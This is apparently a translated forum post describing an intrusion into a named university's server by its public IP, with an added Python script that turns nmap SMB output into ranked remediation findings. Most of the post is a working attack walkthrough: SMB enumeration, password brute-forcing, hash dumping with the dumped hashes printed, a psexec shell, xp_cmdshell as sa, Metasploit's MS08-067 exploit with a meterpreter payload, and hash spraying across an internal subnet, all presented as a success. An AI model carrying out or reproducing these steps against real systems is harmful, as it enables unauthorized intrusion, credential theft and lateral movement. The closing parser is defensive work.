nmap + msf intrusion into Guangxi Normal University
Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // use the MS08-067 vulnerability in msf to exploit the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to attempt logins across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful; a simple msf+nmap attack~~
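Read from the defender's side, the NSE output in the post above (smb-enum-users, smb-enum-shares, smb-brute, smb-pwdump and smb-check-vulns) is a list of misconfigurations that each have a known fix: a null session that enumerates users and reads IPC$, a blank Administrator password, a six-character guessable password, LM hashes still being stored (which is why the hash in the post ends in the empty-string half AAD3B435B51404EE), and an unpatched MS08-067. The following Python script is an added example, not code from the original post or from Nmap, that parses the normal (-oN) output of those five scripts and turns each such line into a ranked finding. The sample output embedded in it is constructed to mirror the layout shown above; the host 10.0.0.5, the domain name and the hex hash values are placeholders. The only facts it relies on beyond the post are the well-known LM and NT hashes of the empty password.

```python
import re
from dataclasses import dataclass

# Constructed sample mirroring Nmap's "Host script results" layout for the
# five SMB scripts; host, RIDs and hex hashes are placeholders, not real data.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.5
445/tcp  open  microsoft-ds
Host script results:
| smb-enum-users:
|_  Domain: LAB-HOST; Users: Administrator, Guest, test
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|_  test:1002 => 0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

SEVERITY_ORDER = ["CRITICAL", "HIGH", "MEDIUM", "LOW"]
# pwdump's marker for an empty hash, plus the well-known LM/NT hashes of "".
EMPTY_MARK = "NO PASSWORD*********************"
EMPTY_LM = {EMPTY_MARK, "AAD3B435B51404EEAAD3B435B51404EE"}
EMPTY_NT = {EMPTY_MARK, "31D6CFE0D16AE931B73C59D7E0C089C0"}

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT_RE = re.compile(r"^(smb[\w-]*):\s*$")
USERS_RE = re.compile(r"^Domain: [^;]+; Users:\s*(?P<users>.+)$")
ACCESS_RE = re.compile(r"^Anonymous access: (?P<access>.+)$")
BRUTE_RE = re.compile(r"^(?P<user>[^:]+):(?P<secret>.*?) => Login was successful")
PWDUMP_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+) => (?P<lm>[^:]+):(?P<nt>.+)$")
VULN_RE = re.compile(r"^(?P<id>[\w-]+): VULNERABLE")


@dataclass
class Finding:
    host: str
    severity: str
    detail: str


def triage(nmap_output: str) -> list:
    """Return one Finding per SMB misconfiguration, most severe first."""
    findings, host, script, share = [], "?", None, None
    for raw in nmap_output.splitlines():
        if m := HOST_RE.match(raw):
            host, script, share = m.group(1), None, None
            continue
        if not raw.startswith("|"):          # port table etc.: not script output
            continue
        line = raw.rstrip().lstrip("|_").strip()   # drop the "| " / "|_" margin
        if m := SCRIPT_RE.match(line):       # a new "| smb-xxx:" header
            script, share = m.group(1), None
        elif script == "smb-enum-users" and (m := USERS_RE.match(line)):
            users = [u.strip() for u in m.group("users").split(",")]
            findings.append(Finding(host, "LOW",
                f"{len(users)} accounts enumerable via null session: {', '.join(users)}"))
        elif script == "smb-enum-shares":
            if m := ACCESS_RE.match(line):
                if m.group("access") != "<none>":
                    sev = "MEDIUM" if share == "IPC$" else "HIGH"
                    findings.append(Finding(host, sev, f"share {share} grants anonymous {m.group('access')}"))
            else:
                share = line                 # a bare share name such as C$
        elif script == "smb-brute" and (m := BRUTE_RE.match(line)):
            user, secret = m.group("user"), m.group("secret")
            if secret == "<blank>":
                findings.append(Finding(host, "CRITICAL", f"account {user} has a blank password"))
            else:
                findings.append(Finding(host, "HIGH",
                    f"account {user} accepted a guessable {len(secret)}-character password"))
        elif script == "smb-pwdump" and (m := PWDUMP_RE.match(line)):
            lm, nt = m.group("lm").upper(), m.group("nt").upper()
            if nt in EMPTY_NT:
                findings.append(Finding(host, "CRITICAL",
                    f"account {m.group('user')} (RID {m.group('rid')}) has an empty NT hash"))
            elif lm not in EMPTY_LM:
                findings.append(Finding(host, "MEDIUM",
                    f"LM hash still stored for {m.group('user')}; enable NoLMHash and reset the password"))
        elif script == "smb-check-vulns" and (m := VULN_RE.match(line)):
            findings.append(Finding(host, "CRITICAL", f"unpatched {m.group('id')}"))
    return sorted(findings, key=lambda f: SEVERITY_ORDER.index(f.severity))


def summarize(findings: list) -> dict:
    """Count findings per severity, reporting all four levels."""
    counts = {s: 0 for s in SEVERITY_ORDER}
    for f in findings:
        counts[f.severity] += 1
    return counts


if __name__ == "__main__":
    for f in triage(SAMPLE_NMAP_OUTPUT):
        print(f"[{f.severity:8}] {f.host}: {f.detail}")
```

Run it as-is to see the seven findings from the constructed sample, or pass the contents of an nmap -oN file to triage() to get the same ranking for a real scan. IPC$ anonymous READ is rated only MEDIUM because it is the null-session default on old Windows and on its own leaks names rather than data; the blank password, the empty NT hash and the missing patch are what let the rest of the post happen, so they sort to the top.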